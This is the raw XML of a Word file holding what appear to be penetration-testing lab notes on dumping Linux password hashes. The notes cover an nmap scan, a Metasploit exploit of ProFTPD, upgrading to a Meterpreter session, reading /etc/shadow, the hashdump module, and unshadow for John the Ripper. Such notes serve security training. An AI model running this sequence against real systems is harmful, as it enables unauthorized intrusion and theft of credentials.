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84957" w14:textId="6DAA32F4" w:rsidR="00853ABF" w:rsidRDefault="00F05BD7">
      <w:r w:rsidRPr="00F05BD7">
        <w:t>Dumping Linux Password Hashes</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662E0CD1" w14:textId="132A7551" w:rsidR="00F05BD7" w:rsidRDefault="002030ED">
      <w:r>
        <w:t>Linux has multi-user support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF1C3C" w14:textId="06B65B46" w:rsidR="002030ED" w:rsidRDefault="002030ED">
      <w:r>
        <w:t>Account info stored in /etc/passwd file.(</w:t>
      </w:r>
      <w:r w:rsidR="00827354" w:rsidRPr="00827354">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00827354" w:rsidRPr="00827354">
        <w:t>(username, UID, GID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , home directory , shell configured</w:t>
      </w:r>
      <w:r w:rsidR="00827354">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF6740" w14:textId="12169A56" w:rsidR="002030ED" w:rsidRDefault="002030ED">
      <w:r>
        <w:t>All the ecrypted passwords are stored in the /etc/shadow file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A88ECAD" w14:textId="77777777" w:rsidR="002030ED" w:rsidRDefault="002030ED"/>
    <w:p w14:paraId="618A0E5D" w14:textId="303987BD" w:rsidR="00827354" w:rsidRDefault="00827354">
      <w:r>
        <w:t xml:space="preserve">Hashing algo </w:t>
      </w:r>
      <w:r w:rsidR="00F73A68">
        <w:t>us</w:t>
      </w:r>
      <w:r>
        <w:t>ed to encrypt passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4A6C4" w14:textId="30B0A964" w:rsidR="00827354" w:rsidRDefault="00827354">
      <w:r w:rsidRPr="00827354">
        <w:t>tell the hash type</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBC421A" w14:textId="3506A5F9" w:rsidR="00827354" w:rsidRDefault="00827354">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1A00C5" wp14:editId="56AD6FBA">
            <wp:extent cx="4330700" cy="1662103"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2053724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724125" name="Picture 205372412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6138" cy="1668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31561" w14:textId="77777777" w:rsidR="00827354" w:rsidRDefault="00827354"/>
    <w:p w14:paraId="017D2B1E" w14:textId="5F98D693" w:rsidR="009607D2" w:rsidRPr="009607D2" w:rsidRDefault="009607D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009607D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355945D9" w14:textId="7C3C2F8D" w:rsidR="009607D2" w:rsidRDefault="009607D2"/>
    <w:p w14:paraId="104C2325" w14:textId="2A9851A4" w:rsidR="009607D2" w:rsidRDefault="009607D2">
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4BBD6" w14:textId="2C40E8E0" w:rsidR="009607D2" w:rsidRDefault="009607D2">
      <w:r>
        <w:t>Nmap -s V target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F4D7D" w14:textId="41EFE743" w:rsidR="009607D2" w:rsidRDefault="001E0511">
      <w:r>
        <w:t xml:space="preserve">Searchsploit ProFTPD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12244068" w14:textId="77777777" w:rsidR="001E0511" w:rsidRDefault="001E0511"/>
    <w:p w14:paraId="2B1D6142" w14:textId="4110B74F" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334E1A7" w14:textId="27C06169" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B510DC7" w14:textId="2DAECE35" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC088E" w14:textId="6B7D20FA" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Search ProFTPD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBC0F8" w14:textId="6D16E0E3" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CDA90" w14:textId="0E475D77" w:rsidR="001E0511" w:rsidRDefault="001E0511">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74F794" w14:textId="4D178B56" w:rsidR="001E0511" w:rsidRDefault="007736BE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614801FC" w14:textId="77777777" w:rsidR="007736BE" w:rsidRDefault="007736BE"/>
    <w:p w14:paraId="707D33DD" w14:textId="3E0E18CA" w:rsidR="00C058A9" w:rsidRPr="00C058A9" w:rsidRDefault="00C058A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C058A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get command shell session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7B056" w14:textId="7D63DCA8" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>/bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74281C86" w14:textId="275C7EFE" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C2737" w14:textId="10C7C894" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t xml:space="preserve">Ctrl+z </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1FC36" w14:textId="5D2DE194" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07BF31" w14:textId="26D66169" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC21D34" w14:textId="5E9F4C7B" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t># upgrade to command shell to meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A0A3E" w14:textId="1AE8B0F1" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6A71A" w14:textId="06449671" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Sessions 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A45B81" w14:textId="51F4185B" w:rsidR="00F73A68" w:rsidRDefault="00F73A68">
      <w:r>
        <w:t># that the created meterpreter session in the upgrade command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE3840" w14:textId="0479A483" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t xml:space="preserve">Sysinfo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D2B4F" w14:textId="577866D0" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D472EE" w14:textId="43AA1F1B" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t># if the getuid is “0 ”it means that it is a root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509E592A" w14:textId="77777777" w:rsidR="0074697B" w:rsidRDefault="0074697B"/>
    <w:p w14:paraId="509EAEB4" w14:textId="027CF4C3" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t>Cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A92CE" w14:textId="65FEA6FC" w:rsidR="00C058A9" w:rsidRDefault="00C058A9">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="0074697B" w:rsidRPr="0074697B">
        <w:t>An empty/disabled password field in /etc/shadow usually means the account cannot be used to log in with a password, and many system/service accounts are configured this way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758955BD" w14:textId="741D6D12" w:rsidR="00C058A9" w:rsidRDefault="000D6905">
      <w:r>
        <w:t>#We see the hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F59D74" w14:textId="77777777" w:rsidR="009607D2" w:rsidRDefault="009607D2"/>
    <w:p w14:paraId="188540DF" w14:textId="3AD8BC24" w:rsidR="000D6905" w:rsidRPr="000D6905" w:rsidRDefault="000D6905">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6905">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Another technique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21948431" w14:textId="2F561910" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:t>Search hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAEB58" w14:textId="7C9E0356" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F3053C" wp14:editId="5FBEB6EA">
            <wp:extent cx="2254366" cy="184159"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="18736511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651171" name="Picture 18736511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4366" cy="184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C0270" w14:textId="0855C0F6" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA7E54" w14:textId="4F3A17D4" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA6C5F0" w14:textId="62EAC371" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set session (meterperter </w:t>
      </w:r>
      <w:r w:rsidR="00D55382">
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D7E81" w14:textId="1A2B4A75" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9DA26" w14:textId="35C30C45" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r>
        <w:t xml:space="preserve"># show the account and their password hash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68EA32" w14:textId="77777777" w:rsidR="000D6905" w:rsidRDefault="000D6905"/>
    <w:p w14:paraId="4F02084C" w14:textId="77777777" w:rsidR="000D6905" w:rsidRDefault="000D6905"/>
    <w:p w14:paraId="0D32762D" w14:textId="74B30A3B" w:rsidR="000D6905" w:rsidRPr="000D6905" w:rsidRDefault="000D6905">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D6905">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71611D16" w14:textId="182A2002" w:rsidR="000D6905" w:rsidRDefault="000D6905">
      <w:r w:rsidRPr="000D6905">
        <w:t>unshadow merges /etc/passwd and /etc/shadow into one crackable format for tools like John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CF459" w14:textId="2C3E6CD6" w:rsidR="00BD1A8A" w:rsidRDefault="00BD1A8A">
      <w:r w:rsidRPr="00BD1A8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UID 0 means “root” — you are running as the superuser.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1A8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1A8A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BD1A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164"/>
    <w:rsid w:val="000D6905"/>
    <w:rsid w:val="001E0511"/>
    <w:rsid w:val="002030ED"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="0074697B"/>
    <w:rsid w:val="007534CA"/>
    <w:rsid w:val="007736BE"/>
    <w:rsid w:val="00827354"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00915164"/>
    <w:rsid w:val="009607D2"/>
    <w:rsid w:val="00BD1A8A"/>
    <w:rsid w:val="00C058A9"/>
    <w:rsid w:val="00D55382"/>
    <w:rsid w:val="00F05BD7"/>
    <w:rsid w:val="00F16BE5"/>
    <w:rsid w:val="00F73A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F98EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29CBDCF7-B74A-49B7-8D56-E49934EE7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5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51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1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1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51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51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1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1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1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1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1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1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tmp"/><Relationship Id="rId4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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-20T11:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-20T12:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>